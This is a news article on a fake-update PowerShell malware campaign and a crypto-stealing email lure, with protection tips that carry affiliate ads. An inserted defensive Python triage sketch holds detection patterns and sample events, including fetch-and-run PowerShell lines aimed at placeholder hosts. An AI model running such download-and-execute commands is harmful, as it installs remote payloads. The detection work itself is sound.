Fake Update Malware Uses Social Engineering to Spread Harmful Software

28 Jun 2024

Proofpoint identified a larger distribution of the fake update malware earlier this month, but the online protection firm believes the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word, and OneDrive errors to coerce users into downloading harmful code. These errors prompt the visitor to click a button to copy a PowerShell “fix” into the clipboard, then paste and run it in a Run dialog or PowerShell prompt.

“Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” warns Proofpoint.

When the PowerShell script runs, it checks whether the device is a valid target and then downloads more payloads. Its steps include clearing the DNS cache, removing clipboard content, showing a fake message, and downloading another remote PowerShell script.
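
A triage sketch for the behaviour chain described above, added here as an example and not taken from Proofpoint's report or this article: it scores PowerShell process-creation or script-block events for the named steps. The command spellings, event field names and sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Steps the article attributes to the pasted "fix". The command spellings
# are assumptions about how each step usually looks; the report's own
# strings are not reproduced on this page.
BEHAVIOURS = {
    "dns_cache_clear": re.compile(r"ipconfig(\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard\b|\|\s*clip(\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString)\b", re.I),
    "dynamic_exec": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe"}


def triage(event):
    """Return (verdict, matched_behaviours) for one process or script-block event."""
    if ntpath.basename(event["image"]).lower() not in SHELLS:
        return "ignore", []
    hits = [name for name, rx in BEHAVIOURS.items() if rx.search(event["text"])]
    fetch_and_run = {"remote_fetch", "dynamic_exec"} <= set(hits)
    cleanup = bool({"dns_cache_clear", "clipboard_clear"} & set(hits))
    # A shell started from the Run dialog has explorer.exe as its parent.
    parent_is_explorer = ntpath.basename(event["parent"]).lower() == "explorer.exe"
    if fetch_and_run and cleanup:
        return "alert", hits   # download-and-run combined with trace cleanup
    if fetch_and_run or (cleanup and parent_is_explorer):
        return "review", hits  # half of the pattern: needs a human look
    return "ignore", hits


# Constructed sample events (not real telemetry). "text" is the command line
# from process-creation logging or the body of a script-block log record.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "text": "powershell -c \"ipconfig /flushdns; Set-Clipboard -Value ' '; "
             "iex (iwr 'http://example.invalid/stage2.ps1')\""},
    {"image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "text": "powershell -c \"iex (irm https://example.invalid/install.ps1)\""},
    {"image": PS, "parent": r"C:\Windows\System32\svchost.exe",
     "text": "powershell -NoProfile -Command Clear-DnsClientCache"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "text": "chrome.exe --new-window"},
]


def verdicts():
    return [triage(e)[0] for e in SAMPLE_EVENTS]
```

Command-line logging only covers the Run-dialog path; commands pasted into an already open PowerShell prompt appear only when script block logging is enabled.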

Cryptocurrency Theft

This second script checks if it’s running on a virtual machine before downloading an info-stealer. Once everything is ready, the hacker can access the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.

Alternative Attack Method: Email Lure

Proofpoint notes that bad actors also use another method called “email lure” to install harmful software. Emails, typically those that appear to be work- or corporate-related, contain an HTML file that resembles Microsoft Word. These emails prompt users to install the “Word Online” extension to view the document correctly. Similar to the method above, users are prompted to open PowerShell and copy over malicious code.

Proofpoint says the deceptive “campaign” is widespread. “The campaign included over 100,000 messages and targeted thousands of organizations globally,” according to the firm.

5 Ways to Protect Yourself from Harmful Software

  1. Have strong antivirus software: The best way to protect yourself from clicking malicious links that install malware, which may then gain access to your private information, is to have antivirus protection installed on all your devices. This can also alert you to any phishing emails or ransomware scams. My top pick is TotalAV, and you can get a limited-time deal for CyberGuy readers: your first year (80% off) for the TotalAV Antivirus Pro package.
  2. Use a VPN: Consider using a VPN to protect against being tracked and against websites identifying your potential location. Many sites can read your IP address and, depending on their privacy settings, may display the city from which you are corresponding. A VPN will disguise your IP address to show an alternate location. My top recommendation is ExpressVPN. It has a quick and easy setup, is available in 105 countries, and will not log your IP address, browsing history, traffic destination or metadata, or DNS queries. Right now, you can get 3 extra months FREE with a 12-month ExpressVPN plan. That’s just .67 per month, a savings of 49%! Try it risk-free for 30 days.
  3. Monitor your accounts: Regularly review your bank statements, credit card statements, and other financial accounts for any unauthorized activity. If you notice any suspicious transactions, report them immediately to your bank or credit card company.
  4. Place a fraud alert: Contact one of the three major credit reporting agencies (Equifax, Experian, or TransUnion) and request a fraud alert to be placed on your credit file. This will make it more difficult for identity thieves to open new accounts in your name without verification.
  5. Enable two-factor authentication: Enable two-factor authentication whenever possible. This adds an extra layer of security by requiring a second form of identification in addition to your password.